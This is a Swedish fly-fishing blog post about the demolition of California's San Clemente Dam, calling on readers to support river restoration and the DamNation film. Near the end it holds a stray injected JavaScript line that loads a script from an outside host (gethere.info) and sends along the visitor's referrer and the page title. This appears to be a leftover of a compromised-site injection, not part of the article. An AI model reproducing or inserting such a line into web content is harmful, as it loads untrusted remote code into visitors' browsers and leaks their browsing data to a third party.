Vakna Sverige och ta bort dammarna!

Nu startar det enorma projektet att montera ner San Clemente-dammen i Kalifornien. Förutom att återskapa flödet och en sund flodbädd för den lokala steelhead-arten och  göra vandringen möjlig igen kommer restaurationen ge stränderna vid havet en naturlig förnyelse av sand. Foto: Patrick Vowell

Allt detta tillsammans ger vinster för både miljö och större möjlighet för många typer av turism. En ekonomi som är bättre och mer hållbar i det långa loppet. Läs mer om projektet här. Det går även att följa projektet via webb-kameror fram till att det är klart. Projektet är beräknat att vara klart 2016.

Men vad kan du göra?

Gå med i Älvräddarna eller starta ditt egen projekt tillsammans med lokala företag. Kan de spränga bort dammar och återskapa floder i USA så kan vi göra det här också!

Skriv till oss och berätta om du håller på med ett spännande projekt. Få andra fiskare att hjälpa till. Ursäkta floskeln, men tillsammans är vi faktiskt starka!

Vi har skrivit om DamNation i Allt om Flugfiske tidigare. Följ deras arbete på Facebook.

Deras film med samma namn har tagit publiken med storm och fått massor med priser. Kolla trailern nedan. Du kan även titta på filmen ”on demand” på Vimeo.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;


MER FRÅN ALLTOMFLUGFISKE.SE

Sponsrad
Sponsrad